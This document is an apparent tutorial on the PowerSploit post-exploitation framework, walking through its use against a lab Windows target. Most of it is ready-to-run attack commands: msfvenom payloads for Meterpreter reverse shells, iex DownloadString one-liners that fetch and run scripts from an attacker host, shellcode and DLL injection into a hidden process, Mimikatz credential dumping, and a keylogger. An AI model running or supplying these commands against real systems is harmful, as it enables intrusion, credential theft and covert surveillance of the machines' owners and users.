Introduction
PowerSploit is a post-infiltration framework software based on PowerShell. It contains many PowerShell attack scripts. They are mainly used for information detection, privilege escalation, and privilege maintenance during infiltration.
https://github.com/mattifestation/PowerSploit
Install and build Powersploit under Linux
Open the Apache service
Put the downloaded file in the /var/www/html directory to build a simple server
Open http://localhost/PowerSploit-master/ in the web page
Introduction to Powersploit modules
- AntivirusBypass finds antivirus features
- CodeExecution executes code on the target host
- Exfiltration information gathering tool on the target host
- Destructive scripts such as Mayhem blue screen
- Persistence backdoor script (persistence control)
- Recon uses the target host as a springboard for intranet information investigation
- ScriptModification creates or modifies scripts on the target host
PowerSpolit module application
Shellcode-the Invoke
the Invoke-Sellcode scripting language commonly used in CodeExecution ShellCode module will insert the specified process ID or local Powershell, the module can be used in conjunction with MSF achieve unexpected results.
1. Directly execute ShellCode to rebound Meterpreter Shell.
First use the reverse_https module in MSF to rebound.
Use the msfvenom command to generate a PowerShell script Trojan.
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.213.136 LPORT=4444 -f powershell -o /var/www/html/test
Then enter the following command under the target machine Powershell to download the script
iex(New-Object Net.WebClient).DownloadString("http://192.168.213.136/PowerSploit-master/CodeExecution/Invoke-Shellcode.ps1")
Then enter the following command to download the Trojan
iex(New-Object Net.WebClient).DownloadString("http://192.168.213.136/test")
Then run the command under PowerShell
Invoke-Shellcode -Shellcode ($buf) -Force
-Force means to execute directly without prompting. Return to the monitoring interface of MSF and find that the bounce has been successful.
2. Invoke-Portscan scans the port
Invoke-Portscan is a script under the Recon module, mainly used for port scanning, and it is also very simple to use.
First download the script
IEX (New-Object Net.WebClient).DownloadString("http://192.168.213.136/PowerSploit-master/Recon/Invoke-Portscan.ps1")
Then use the following command to scan
Invoke-Portscan -Hosts 192.168.213.138,192.168.213.136 -Ports "80,22,3389,4444"
3. Invoke-DllInjection DLL injection script
Invoke-DllInjection is a script under the Code Execution module, which is a DLL injection script.
First download the script
IEX (New-Object Net.Webclient).DownloadString("http://192.168.213.136/PowerSploit-master/CodeExecution/Invoke-DllInjection.ps1")
Then use the following command to generate a DLL injection script in kali (default is a 32-bit script, if you want to generate a 64-bit script, add an x64)
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.213.136 lport=4444 -f dll -o /var/www/html/test.dll
After uploading the generated test.dll to the C drive of the target server, you can start a new process for DLL injection, which can make the injection more hidden. Use the following command to create a new hidden process named notepad.exe.
Start-Process C:\Windows\System32\notepad.exe -WindowStyle Hidden
Then get the pid of notepad.exe.
Then use the following command to inject
Invoke-DllInjection -ProcessID 5080 -Dll c:\test.dll
Injection is successful
Return to the MSF monitoring interface, and then use the reverse_tcp module to rebound, and it is found that the rebound has been successful.
4. Invoke-Mimikatz information collection
Invoke-Mimikatz is a script under the Exfiltration module. Used for information collection.
First download the command
IEX (New-Object Net.WebClient).DownloadString("http://192.168.213.136/PowerSploit-master/Exfiltration/Invoke-Mimikatz.ps1")
Then run the command
Invoke-Mimikatz -DumpCreds
invoke-mimikatz -Command "Privilege::Debug Sekurlsa::logonpasswords"
5. Get-Keystrokes Keylogger
Get-Keystrokes is a script under the Exfiltration module. It is used for keylogging. It can record keyboard input records, mouse clicks, and record detailed time.
First download the script
IEX (New-Object Net.WebClient).DownloadString("http://192.168.213.136/PowerSploit-master/Exfiltration/Get-Keystrokes.ps1")
Then execute the following command to turn on the keylogger
Get-Keystrokes -LogPath c:\key.txt